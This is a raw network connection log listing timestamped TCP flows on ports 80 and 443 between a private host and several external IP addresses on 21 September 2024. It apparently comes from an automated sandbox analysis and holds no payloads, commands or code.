Sep 21, 2024 14:48:10.672686100 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.672697067 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.672712088 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.672732115 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.672761917 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.672769070 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.672780037 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.672785997 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.672810078 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.672823906 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.672831059 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.672842026 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.672848940 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.672854900 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.672868967 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.672890902 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.673257113 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.673264027 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.673274994 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.673315048 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.673321962 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.673329115 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.673341036 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.673346996 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.673355103 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.673368931 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.673388004 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.673399925 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.681965113 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.681989908 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.681997061 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.682003021 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.682010889 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.682018042 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.682024956 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.682044983 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.682053089 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.682059050 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.682066917 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.682091951 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.682100058 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.682111025 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.682111025 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.682112932 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.682148933 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.682180882 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.682188988 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.682209015 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.682215929 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.682244062 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.682257891 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.682274103 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.682281017 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.682293892 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.682321072 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.682327032 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.682332993 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.682333946 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.682354927 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.682405949 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.682426929 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.682432890 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.682446003 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.682451010 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.682456970 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.682463884 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.682463884 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.682471037 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.682477951 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.682535887 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.682535887 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.682596922 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.682605028 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.682611942 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.682640076 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.682657957 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.682676077 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.682691097 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.682703972 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.682709932 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.682718992 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.682739973 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.682759047 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.682769060 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.682802916 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.682810068 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.682821989 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.682827950 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.682833910 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.682846069 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.682852030 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.682852030 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.682873964 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.682889938 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.682904005 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.682931900 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.682990074 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.682996988 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.683011055 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.683017969 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.683038950 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.683054924 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.683104038 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.683226109 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.683233023 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.683244944 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.683249950 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.683264017 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.683279037 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.683279991 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.683285952 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.683293104 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.683298111 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.683298111 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.683306932 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.683319092 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.683317900 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.683329105 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.683352947 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.683367968 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.683402061 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.683418036 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.683425903 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.683432102 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.683437109 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.683449984 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.683456898 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.683464050 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.683469057 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.683475018 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.683480024 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.683480978 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.683480024 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.683490992 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.683506966 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.683538914 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.683732033 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.683739901 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.683753967 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.683759928 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.683785915 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.683819056 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.683820009 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.683826923 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.683839083 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.683845043 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.683856964 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.683864117 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.683871031 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.683872938 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.683887005 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.683995008 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.684106112 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.684113026 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.684125900 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.684132099 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.684139967 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.684166908 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.684185982 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.684279919 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.684288025 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.684298992 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.684308052 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.684313059 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.684324980 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.684330940 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.684334993 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.684344053 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.684351921 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.684356928 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.684361935 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.684362888 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.684371948 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.684376001 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.684376955 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.684385061 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.684390068 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.684396029 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.684400082 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.684401989 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.684416056 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.684443951 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.684468985 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.684468985 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.684503078 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.684551001 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.684557915 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.684568882 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.684603930 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.700062037 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.700078011 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.700088978 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.700140953 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.700146914 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.700179100 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.700212002 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.700236082 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.700243950 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.700264931 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.700272083 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.700284958 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.700290918 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.700293064 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.700299978 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.700305939 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.700314045 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.700319052 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.700336933 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.700357914 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.700392008 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.700397968 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.700409889 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.700438976 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.700440884 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.700445890 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.700457096 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.700459003 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.700490952 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.700504065 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.700529099 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.701425076 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.701432943 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.701445103 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.701482058 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.701495886 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.701503038 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.701514959 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.701520920 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.701548100 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.701548100 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.701556921 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.701566935 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.701570034 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.701575041 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.701598883 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.701612949 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.701745033 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.701751947 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.701762915 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.701767921 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.701772928 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.701781988 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.701787949 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.701793909 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.701807022 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.701813936 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.701828003 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.701836109 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.701848984 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.701874018 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.701905966 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.701913118 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.701922894 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.701922894 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.701922894 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.701935053 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.701950073 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.702042103 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.702049017 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.702054977 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.702060938 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.702066898 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.702073097 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.702085018 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.702131033 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.702137947 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.702148914 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.702148914 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.702148914 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.702148914 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.702177048 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.702205896 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.702229023 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.702291012 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.702300072 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.702327967 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.702357054 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.702364922 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.702377081 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.702384949 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.702389956 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.702404022 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.702421904 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.702457905 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.702466011 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.702477932 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.702483892 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.702490091 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.702497005 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.702507019 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.702507973 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.702527046 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.702541113 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.702558994 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.702683926 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.702691078 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.702703953 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.702733994 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.702758074 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.702764988 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.702770948 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.702776909 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.702794075 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.702814102 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.702852011 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.702898979 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.702907085 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.702951908 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.702987909 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.702996016 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.703007936 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.703013897 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.703044891 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.703069925 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.713398933 CEST	443	49726	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:10.713505030 CEST	49726	443	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:10.714432955 CEST	443	49726	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:10.714529991 CEST	49726	443	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:10.717636108 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.717757940 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.717762947 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.717775106 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.717782021 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.717787027 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.717792988 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.717798948 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.717824936 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.717849016 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.718034983 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.718080997 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.718086004 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.718144894 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.718147039 CEST	49712	80	192.168.2.9	103.130.147.211
